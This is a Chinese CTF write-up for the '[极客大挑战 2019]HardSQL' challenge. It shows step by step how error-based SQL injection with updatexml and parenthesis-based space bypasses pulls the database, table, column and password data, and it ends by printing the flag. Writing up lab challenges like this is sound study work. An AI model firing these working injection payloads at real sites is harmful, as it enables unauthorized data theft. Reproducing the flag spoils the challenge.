首页 > 数据库 >[极客大挑战 2019]HardSQL,wp

[极客大挑战 2019]HardSQL,wp

时间:2023-05-03 21:33:56浏览次数:52  
标签:username 极客 HardSQL 0x7e 过滤 2019 updatexml password concat

一:分析

既然说了是HardSQL,肯定就不是万能密码这种简单的了

1.首先判断字符型还是数字型

我们首先输入payload:username=admin' --+&password=1

发现好像有什么被过滤掉了。

然后检查过滤符号,这里可以直接用bp爆破看看过滤了哪些字符,也可以简单测试一下

这里我猜测过滤了空格,

 然后payload:username=admin'--+&password=1

 

这里报错位置显示 '1'' ,说明是字符型

 

收获:字符型,空格被过滤

二:绕过过滤

1.尝试一下/**/     (发现/**/也被过滤掉了)

 

2.现在尝试用() 括号来尝试进行绕过

原理:括号是来包含子查询的,任何可以计算出结果的语句都可以用括号围起来,

而括号的两端,可以没有多余的空格

三:观察后猜测是报注入

1.尝试用 updatexml 注入:

admin'or(updatexml(1,concat(0x7e,database(),0x7e),1))#&password=1

报错注入有两个函数,这里我们使用updatexml(a,b,c),此函数a,c必须为String类型,因此可以使a,c不为String型进行报错

在ASCII码表中,0x7e这个十六进制数代表符号~,~这个符号在xpath语法中是不存在的,因此总能报错。

2.但是发现需要username 和 password 都需要参数

而且发现 ' 分号和 # 没有被 url编码,这里进行编码一下

所以

payload: username=1%27or(updatexml(1,concat(0x7e,database(),0x7e),1))%23&password=1

 收获:获得了一个geek库

四:找表

pyload:

username=1%27or(updatexml(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where(table_schema)like(database())),0x7e),1))%23&password=1

 

收获:拿到了 H4rDsq1 这个表

五:拿字段

payload:

username=1%27or(updatexml(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where(table_schema)like(database())),0x7e),1))%23&password=1

 

 

六:这个时候查询字段里面的内容

 

结果: 只拿到了flag的前半部分

这里还有一个函数 RIGHT() 这个函数从指定字符串的右侧提取给定数量的字符

username=1%27or(updatexml(1,concat(0x7e,(select(group_concat((right(password,25))))from(H4rDsq1)),0x7e),1))%23&password=1

 

 

最后拼接flag :flag{60390145-0ddd-420d-a7e6-cbb757e91687}

 

标签:username,极客,HardSQL,0x7e,过滤,2019,updatexml,password,concat
From: https://www.cnblogs.com/xxpanda/p/17369708.html

相关文章

  • 2019-推荐文章
    前言记录平时遇到的优质技术文章,按时间先后排序。内容2019-05-11《博客园美化教程大集合----极致个性化你的专属博客(超详细,看这篇就够了)》网上写图文教程的人,还真是贴心。2019-09-06https://www.yuque.com/sxc/front/kvokg4作者在语雀上的系列文章,都值得一看。2019-1......
  • 2019年-前端日记
    2019-04-02Vue屏幕宽度自适应:https://blog.csdn.net/qq_25386583/article/details/77161478https://blog.csdn.net/xuaner8786/article/details/815652192019-04-07控制iframe中的页面只显示一部分:https://blog.csdn.net/iteye_18722/article/details/819185632019-04-09......
  • 青岛市程序设计竞赛冲刺④(2019山东省小学组试题)
    1.随机数原题: 解题思路:求出输入值中的最大值,从这个数输出到6即可AC代码:#include<bits/stdc++.h>#definelllonglongusingnamespacestd;intx,y;intmain(){ freopen("random.in","r",stdin); freopen("random.out","w",stdout); cin>......
  • ReSharper 2019.2.3安装教程
    摘抄:ReSharper2019破解版-ReSharperUltimatev2019.2.3完美破解版下载(附注册补丁)-艾薇下载站(aiweibk.com)安装准备文件:1、运行安装程序,JetBrains.ReSharper.2019.1.1.exe选择你需要的工具组件,并勾选接受协议,点next我这里就选了第一项组件,其他组件不知道什么意思 2......
  • [TJOI2019]甲苯先生的滚榜
    [TJOI2019]甲苯先生的滚榜又双叒叕来水博客了几乎就是一个板子,虽然有两个关键字,但是实际上可以压成一个。k=a*mo-b其中a为过题数,b为罚时,mo=2e6,因为b<1.5e6。所以我们可以用这样一个二元组来表示。虽然说相同的二元组可以对应不同的人,但实际上是谁不重要,重要的是有哪些数。然......
  • Fuzzing101-Exercise1 fuzz xpdf CVE-2019-13288
    author:cxingdate:2023年4月28日0x00前期准备第一个exercise是复现xpdf的CVE-2019-13288,在正式进入fuzz之前我们需要了解xpdf和CVE-2019-13288。找到xpdf的官网,上面有一句简短的介绍。XpdfisafreePDFviewerandtoolkit,includingatextextractor,imagecon......
  • Unity 2019.1 中文更新日志速览版
    洪流学堂微信公众号。洪流学堂,学Unity快人几步Unity2019.1已经正式发布,快来看看一些核心新功能吧!完整版的中文更新日志可在洪流学堂微信公众号回复2019.1获取。今年Unity的第一个技术版本——Unity2019.1已经发布。它包括许多新的可用于生产的功能,例如BurstCompiler,Lightweight......
  • buu [极客大挑战 2019]PHP
    打开网页,发现重点是网页备份,所以使用dirsearch进行扫描,20分钟后扫出结果,发现www.zip文件解压后查看index.php,看到页面通过get方法获得select的值,并将其反序列化,传给变量res查看class.php,只有username='admin'且password=100时,执行__destruct()时会输出flag。__destruct()是php......
  • 2023程序设计竞赛冲刺③(2019青岛市程序设计竞赛小学组)
    1.取余原题: 解题思路:这道题30%的数据可以开longlong去存储计算,但100%的数据最多有3000位,无法存储,所以可以运用同余的性质,(a*b)%p=(a%p*b%p)%pAC代码:#include<bits/stdc++.h>#definelllonglongusingnamespacestd;constintN=1e3+5,MOD=1e4+7;;lla[N],n,ans......
  • VS2019离线下载安装
    移步https://learn.microsoft.com/en-us/visualstudio/install/create-a-network-installation-of-visual-studio?view=vs-2019#download-the-visual-studio-bootstrapper-to-create-the-network-layout安装步骤......